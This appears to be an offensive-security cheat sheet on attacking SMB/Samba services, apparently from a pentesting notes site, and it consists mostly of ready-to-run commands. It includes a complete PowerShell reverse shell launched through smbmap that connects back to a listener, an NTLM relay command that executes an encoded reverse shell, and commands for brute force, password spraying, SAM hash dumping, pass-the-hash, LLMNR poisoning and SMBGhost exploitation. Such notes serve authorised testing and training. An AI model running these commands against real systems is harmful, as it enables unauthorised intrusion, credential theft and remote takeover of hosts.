Pentesting SMB

SMB Enumeration

The SMB is a network file sharing protocol that provides access to shared files and printers on a local network.
When clients and servers use different operating systems and SMB versions, the highest supported version will be used for communication.
SMB uses the following TCP and UDP ports:

Netbios-ns 137/tcp #NETBIOS Name Service
Netbios-ns 137/udp
netbios-dgm 138/tcp #NETBIOS Datagram Service
Netbios-dgm 138/udp
Netbios-ssn 139/tcp #NETBIOS session service
Netbios-ssn 139/udp
Microsoft-ds 445/tcp #if you are using active directory

SMB Checklist

Basic Commands
From SMB command line
View/Get Files

get services.txt
more services.txt

Enumerate Hostname

nmblookup -A $ip

List Shares

smbmap -H $ip
smbclient -L 10.129.101.197 -U Administrator
nmap --script smb-enum-shares -p 139,445 $ip

If Samba is on a non-standard port, pass the port explicitly:

smbmap -H $ip -P 36445
smbclient -U "" -L $ip -p 36445
nmap --script smb-enum-shares -p 36445 $ip

Connect to a listed share

smbclient \\\\10.129.101.197\\C$ -U Administrator
smbclient \\\\$ip\\[share name]

Check Null Sessions

smbmap -u anonymous -H 10.10.115.116
smbmap -H $ip
rpcclient -U "" -N $ip

With authentication

smbmap -u svc-admin -p management2005 -H 10.10.248.93

Check for Vulnerabilities

nmap --script smb-vuln* -p 139,445 $ip

Overall Scan

enum4linux -a $ip

Get a shell with smbmap (windows)

smbmap -u jsmith -p 'R33nisP!nckle' -d ABC -h 192.168.2.50 -x 'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.153""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize  ;$p=New-Object System.Diagnostics.Process  ;$p.StartInfo.FileName=""""cmd.exe""""  ;$p.StartInfo.RedirectStandardInput=1  ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0  ;$p.Start()  ;$is=$p.StandardInput  ;$os=$p.StandardOutput  ;Start-Sleep 1  ;$e=new-object System.Text.AsciiEncoding  ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length)  ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}}  if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else {  $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}}  $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'

Brute Force SMB

medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt
nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip  -vvvv

smbmap

smbmap is one of the best ways to enumerate samba. smbmap allows pen-testers to run commands(given proper permissions), download and upload files, and overall is just incredibly useful for smb enumeration.

smbmap -u "admin" -p "password" -H 10.10.10.10 -x "ipconfig"

-s -> specify the share to enumerate
-d -> specify the domain to enumerate
--download -> downloads a file
--upload -> uploads a file

smbclient

List shares

smbclient -L 10.10.115.116

smbclient allows you to do most of the things you can do with smbmap, and it also offers you and interactive prompt.
-w -> specify the domain(workgroup) to use when connecting to the host
-I -> specify the ip address of the host
-c "ipconfig" -> would run the ipconfig command on the host
-U -> specify the username to authenticate with
-P -> specifies the password to authenticate with
-N -> tells smbclient to not use a password
get test -> would download the file named test
put /etc/hosts -> would put your /etc/hosts file on the target
Syntax:
To see which shares are available on a given host, run:

 /usr/bin/smbclient -L 10.10.10.10

For example, if you are trying to reach a directory that has been shared as 'public' on a machine called 10.10.10.10, the service would be called \10.10.10.10\public. -
However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:

/usr/bin/smbclient \\\\10.10.10.10\\public mypasswd

To authenticate with a null sessions

smbmap -u 'root' -p '' -H 10.10.232.5 -x 'ip addr'

smbclient with domain credentials

smbclient -U 'RLAB\ngodfrey' -p 445 -L 127.0.0.1

rpcclient

A tool used for executing client-side MS-RPC functions. A null session in a connection with a samba or SMB server that does not require authentication with a password.

rpcclient -U "" [target ip address]

The -U option defines a null username, you will be asked for a password but leave it blank (hit enter!!!!)
The command line will change to the rpcclient context

rpcclient $>

To retrieve some general information about the server like the domain and number of users:

querydominfo

This command returns the domain, server, total users on the system and some other useful information.
Also shows the total number of user accounts and groups available on the target system.
To retrieve a list of users present on the system

enumdomusers

The result is a list of user accounts available on the system with the RID in hex. We can now use rpcclient to query the user info for more information:

lookupsids #convert SIDs to names
lookupsids S-1-5-21-3981879597-1135670737-2718083060-1002
lookupnames #convert names to SIDs
lookupnames Bill
queryuser 0x47f #get the user rid form enomdomusers command
queryusergroups 0x47b #use the rid for the username to see their group membership
querygroup 0x47c #when you get the group membership back use those rids for this query

enumprivs
found 35 privileges
SeCreateTokenPrivilege          0:2 (0x0:0x2)
SeAssignPrimaryTokenPrivilege           0:3 (0x0:0x3)
SeLockMemoryPrivilege           0:4 (0x0:0x4)
SeIncreaseQuotaPrivilege                0:5 (0x0:0x5)
SeMachineAccountPrivilege               0:6 (0x0:0x6)
SeTcbPrivilege          0:7 (0x0:0x7)
SeSecurityPrivilege             0:8 (0x0:0x8)
SeTakeOwnershipPrivilege                0:9 (0x0:0x9)
SeLoadDriverPrivilege           0:10 (0x0:0xa)
SeSystemProfilePrivilege                0:11 (0x0:0xb)
SeSystemtimePrivilege           0:12 (0x0:0xc)
SeProfileSingleProcessPrivilege                 0:13 (0x0:0xd)
SeIncreaseBasePriorityPrivilege                 0:14 (0x0:0xe)
SeCreatePagefilePrivilege               0:15 (0x0:0xf)
SeCreatePermanentPrivilege              0:16 (0x0:0x10)
SeBackupPrivilege               0:17 (0x0:0x11)
SeRestorePrivilege              0:18 (0x0:0x12)
SeShutdownPrivilege             0:19 (0x0:0x13)
SeDebugPrivilege                0:20 (0x0:0x14)
SeAuditPrivilege                0:21 (0x0:0x15)
SeSystemEnvironmentPrivilege            0:22 (0x0:0x16)
SeChangeNotifyPrivilege                 0:23 (0x0:0x17)
SeRemoteShutdownPrivilege               0:24 (0x0:0x18)
SeUndockPrivilege               0:25 (0x0:0x19)
SeSyncAgentPrivilege            0:26 (0x0:0x1a)
SeEnableDelegationPrivilege             0:27 (0x0:0x1b)
SeManageVolumePrivilege                 0:28 (0x0:0x1c)
SeImpersonatePrivilege          0:29 (0x0:0x1d)
SeCreateGlobalPrivilege                 0:30 (0x0:0x1e)
SeTrustedCredManAccessPrivilege                 0:31 (0x0:0x1f)
SeRelabelPrivilege              0:32 (0x0:0x20)
SeIncreaseWorkingSetPrivilege           0:33 (0x0:0x21)
SeTimeZonePrivilege             0:34 (0x0:0x22)
SeCreateSymbolicLinkPrivilege           0:35 (0x0:0x23)
SeDelegateSessionUserImpersonatePrivilege               0:36 (0x0:0x24)

Enumerate Privleges on the target box

getusername
Account Name: Guest, Authority Name: RELEVANT

Get username you are running as

queryuser [username]
username=pbx
queryuser pbx, queryuser 1000, queryuser 0x3e8

-This command will return information about the profile path on the server, the home drive, password related settings and a lot more.

To see an overview of all enumeration objects just type enum+tabx2.
If you get an error that says:

Cannot connect to server.  Error was NT_STATUS_CONNECTION_DISCONNECTED

Occurs because the minimum protocol version for smbclient has been set to SMB2_02
Fix with:

sudo vim /etc/samba/smb.conf

Add the following line to the config under the [global] section

client min protocol = CORE

Alternative method to enumdomusers is through RID cycling.
To determine the full SID we can run the: ‘lookupnames’ command and search for the domain with the following command:

lookupnames pbx

There are two sets of RIDS 500-1000 for system and 1000-10000 for Domain created users and groups.
If we append -500 to the SID and look it up using the lookupsids command we get the following output with the username:

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-500
S-1-5-21-532510730-1394270290-3802288464-500 *unknown*\*unknown* (8)

Shows SID is unknown, increase by one

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-501
S-1-5-21-532510730-1394270290-3802288464-501 PBX\nobody (1)

Find a valid user, increase the RID to 1000.

rpcclient $> lookupsids S-1-5-21-532510730-1394270290-3802288464-1000
S-1-5-21-532510730-1394270290-3802288464-1000 PBX\pbx (1)

Have the full SID now

Manual RID Cycling Technique

When enumdomusers fails, manually cycle through RIDs to find users:

rpcclient -U hazard 10.129.96.157
# Enter password

# First, get SID for a known user
lookupnames hazard
# hazard S-1-5-21-4254423774-1266059056-3197185112-1008 (User: 1)

# Now cycle through RIDs using the domain SID prefix
# RID 500 = Administrator
lookupsids S-1-5-21-4254423774-1266059056-3197185112-500
# S-1-5-21-4254423774-1266059056-3197185112-500 SUPPORTDESK\Administrator (1)

# Continue incrementing through 1000+ for user-created accounts
lookupsids S-1-5-21-4254423774-1266059056-3197185112-1000
lookupsids S-1-5-21-4254423774-1266059056-3197185112-1001
# ... continue ...
lookupsids S-1-5-21-4254423774-1266059056-3197185112-1009
# S-1-5-21-4254423774-1266059056-3197185112-1009 SUPPORTDESK\support (1)

lookupsids S-1-5-21-4254423774-1266059056-3197185112-1012
# S-1-5-21-4254423774-1266059056-3197185112-1012 SUPPORTDESK\Chase (1)

Key RID ranges:

RID

Description

500

Administrator

501

Guest

502

krbtgt (DCs only)

512-519

Domain groups

1000+

User-created accounts

Tip: Cycle through RIDs 500, 501, then 1000-1050 to find hidden users when other enumeration fails.

lookupsid.py Username Enumeration

Impacket’s lookupsid.py performs bruteforcing of Windows SID’s to identify users/groups on the remote target.
You need to be able to connect to IPC$ without authentication or with a known password and username

python3 lookupsid.py [email protected] | tee users.txt
Password:
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Brute forcing SIDs at 10.10.11.35
[*] StringBinding ncacn_np:10.10.11.35[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-917908876-1423158569-3159038727
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
513: CICADA\Domain Users (SidTypeGroup)
514: CICADA\Domain Guests (SidTypeGroup)
515: CICADA\Domain Computers (SidTypeGroup)
516: CICADA\Domain Controllers (SidTypeGroup)
517: CICADA\Cert Publishers (SidTypeAlias)
518: CICADA\Schema Admins (SidTypeGroup)
519: CICADA\Enterprise Admins (SidTypeGroup)
520: CICADA\Group Policy Creator Owners (SidTypeGroup)
521: CICADA\Read-only Domain Controllers (SidTypeGroup)
522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
525: CICADA\Protected Users (SidTypeGroup)
526: CICADA\Key Admins (SidTypeGroup)
527: CICADA\Enterprise Key Admins (SidTypeGroup)
553: CICADA\RAS and IAS Servers (SidTypeAlias)
571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)

Enum4linux

Enum4linux is a linux alternative to enum.exe and it is used to enumerate data from windows or samba hosts.

enum4linux [target ip]

-Will auto RID cycle

Part of autorecon!
Recommend to > output to a text file for reference (its alot)

Nmap SMB scripts

ls -l /usr/share/nmap/scripts/smb*
nmap --script=[scriptname] [target ip]

For smb-os-discovery:

nmap -p 139,445 --script=smb-os-discovery [target ip]

First scans the target for all known SMB vulnerabilities
Second to see if target is vulnerable to EternalBlue

nmap -p 139,445 --script=smb-vuln* [target ip]
nmap -p 445 [target] --script=smb-vuln-ms17-010

Finding the Password Policy

Various ways to find a box's password policy

netexec smb 10.10.10.161 --pass-pol
netexec smb 10.10.10.161 --pass-pol -u '' -p ''
enum4linux 10.10.10.161

The reason this will sometimes not work is because when you install a new domain now null sessions will be disabled
However when a domain was upgraded from Windows 2000/2003/2008 they kept this feature on in order to have backwards compatibility

Impacket psexec command execution

psexec.py CICADA/emily.oscars:'Q!3@Lp#M6b*7t*Vt'@10.10.11.35 dir

Bruteforcing SMB

If bruteforcing smb, remember that hydra does not support smbv1
If your target is non domain joined, ensure you have a .\ in front of your username
--ignore-pw-decoding is required for rockyou.txt

nxc smb 10.129.42.254 -u '.\bob' -p pw.txt --share users --ignore-pw-decoding

Samba Configuration

Config File

Config path: /etc/samba/smb.conf

cat /etc/samba/smb.conf | grep -v "#\|\;"

Restart Samba

sudo systemctl restart smbd

SMB Version History

SMB Version

Supported

Features

CIFS

Windows NT 4.0

Communication via NetBIOS interface

SMB 1.0

Windows 2000

Direct connection via TCP

SMB 2.0

Windows Vista, Windows Server 2008

Performance upgrades, improved message signing, caching feature

SMB 2.1

Windows 7, Windows Server 2008 R2

Locking mechanisms

SMB 3.0

Windows 8, Windows Server 2012

Multichannel connections, end-to-end encryption, remote storage access

SMB 3.0.2

Windows 8.1, Windows Server 2012 R2

SMB 3.1.1

Windows 10, Windows Server 2016

Integrity checking, AES-128 encryption

Dangerous Samba Settings

Setting

Description

browseable = yes

Allow listing shares

read only = no

Allow file modification

writable = yes

Allow creation/modification

guest ok = yes

No password required

enable privileges = yes

Honor SID-based privileges

create mask = 0777

World-writable new files

directory mask = 0777

World-writable new dirs

logon script = script.sh

Script on login

magic script = script.sh

Script on file close

magic output = script.out

Magic script output file

RPCclient Commands Reference

Command

Description

srvinfo

Server information

enumdomains

Enumerate all domains

querydominfo

Domain, server, user count

netshareenumall

Enumerate all available shares

netsharegetinfo <share>

Share info by name

enumdomusers

Enumerate domain users

queryuser <RID>

User info by RID

querygroup <RID>

Group info by RID

RID Brute Force (Bash Loop)

for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo "";done

Impacket samrdump.py

samrdump.py 10.129.14.128

Samba Status (Server-side)

smbstatus

Windows CMD

C:\htb> net use n: \\192.168.220.129\Finance
C:\htb> net use n: \\192.168.220.129\Finance /user:plaintext Password123

List directory, count files, search filenames for creds/secrets, and search inside files:

C:\htb> dir \\192.168.220.129\Finance\
C:\htb> dir n: /a-d /s /b | find /c ":\"
C:\htb> dir n:\*cred* /s /b
C:\htb> dir n:\*secret* /s /b
C:\htb> findstr /s /i cred n:\*.*

Windows PowerShell

Get-ChildItem \\192.168.220.129\Finance\

Map drive:

New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem"

Map drive with credentials:

$username = 'plaintext'
$password = 'Password123'
$secpassword = ConvertTo-SecureString $password -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential $username, $secpassword
New-PSDrive -Name "N" -Root "\\192.168.220.129\Finance" -PSProvider "FileSystem" -Credential $cred

Search files:

(Get-ChildItem -File -Recurse | Measure-Object).Count
Get-ChildItem -Recurse -Path N:\ -Include *cred* -File
Get-ChildItem -Recurse -Path N:\ | Select-String "cred" -List

Linux Mount

sudo mkdir /mnt/Finance
sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance

Mount with credential file:

mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile

Credential file format:

username=plaintext
password=Password123
domain=.

Search mounted shares:

find /mnt/Finance/ -name *cred*
grep -rn /mnt/Finance/ -ie cred

smbmap Advanced Usage

Browse directory contents:

smbmap -H 10.129.14.128 -r notes

Download file:

smbmap -H 10.129.14.128 --download "notes\note.txt"

Upload file:

smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"

NetExec Advanced Usage

Password Spraying

netexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth

--continue-on-success — keep spraying after a valid hit
--local-auth — for non-domain joined machines

Remote Command Execution

netexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec

-x — execute cmd commands
-X — execute PowerShell commands
--exec-method — smbexec, mmcexec, atexec, wmiexec

Enumerate Logged-on Users

netexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users

Extract SAM Hashes

netexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam

Pass-the-Hash

netexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE

Impacket PsExec

impacket-psexec administrator:'Password123!'@10.10.110.17

Responder — LLMNR/NBT-NS Hash Capture

Responder poisons LLMNR, NBT-NS, and MDNS responses on the local network to capture NTLMv2 hashes when a victim makes a request to a nonexistent share or host.

sudo responder -I ens33

Captured hashes stored in /usr/share/responder/logs/.

Crack NTLMv2 hash with Hashcat (module 5600):

hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

NTLM Relay

Relay captured NTLM authentication to a different host instead of cracking. Requires SMB signing disabled on the target.

Disable SMB in Responder config:

cat /etc/responder/Responder.conf | grep 'SMB ='
# SMB = Off

Relay to dump SAM:

impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146

Relay with reverse shell command:

impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <BASE64_ENCODED_REVERSE_SHELL>'

Catch shell:

nc -lvnp 9001

Use impacket-smbserver to create a fake SMB share and capture hashes:

sudo impacket-smbserver share ./ -smb2support

Authenticated SMB File Server (for Transfers)

When guest access is blocked, use an authenticated smbserver:

sudo impacket-smbserver -username "admin" -password "password123" -smb2support share /tmp/share

Map the share from PowerShell on the target:

$cred = New-Object System.Management.Automation.PSCredential ("admin", (ConvertTo-SecureString "password123" -AsPlainText -Force))
New-PSDrive -Name "TempShare" -PSProvider FileSystem -Root "\\<ip>\share" -Credential $cred -Persist:$false

# Copy files
Copy-Item -Path "file.txt" -Destination "TempShare:\" -Force

# Remove drive when done
Remove-PSDrive -Name "TempShare"

SMBGhost (CVE-2020-0796)

Affects SMBv3.1.1 compression in Windows 10 versions 1903 and 1909
Integer overflow vulnerability leading to remote code execution
No authentication required
PoC: https://www.exploit-db.com/exploits/48537
If you already have a Meterpreter session, Metasploit's local module can escalate vulnerable Windows 10 v1903/v1909 x64 targets to SYSTEM:

exploit/windows/local/cve_2020_0796_smbghost

set SESSION <session_id>
set TARGET 0
set PAYLOAD windows/x64/meterpreter/reverse_tcp
run

Successful output includes:

The target appears to be vulnerable.
Meterpreter session opened
Server username: NT AUTHORITY\SYSTEM

PreviousPentesting phpMyAdmin NextPentesting Redis

Last updated 24 days ago

SMB Enumeration

SMB Checklist

smbmap

smbclient

rpcclient

Manual RID Cycling Technique

lookupsid.py Username Enumeration

Enum4linux

Nmap SMB scripts

Finding the Password Policy

Impacket psexec command execution

Bruteforcing SMB

Samba Configuration

Config File

Restart Samba

SMB Version History

Dangerous Samba Settings

RPCclient Commands Reference

RID Brute Force (Bash Loop)

Impacket samrdump.py

Samba Status (Server-side)

SMB Share Interaction

Windows CMD

Windows PowerShell

Linux Mount

smbmap Advanced Usage

NetExec Advanced Usage

Password Spraying

Remote Command Execution

Enumerate Logged-on Users

Extract SAM Hashes

Pass-the-Hash

Impacket PsExec

Responder — LLMNR/NBT-NS Hash Capture

NTLM Relay

Authenticated SMB File Server (for Transfers)

SMBGhost (CVE-2020-0796)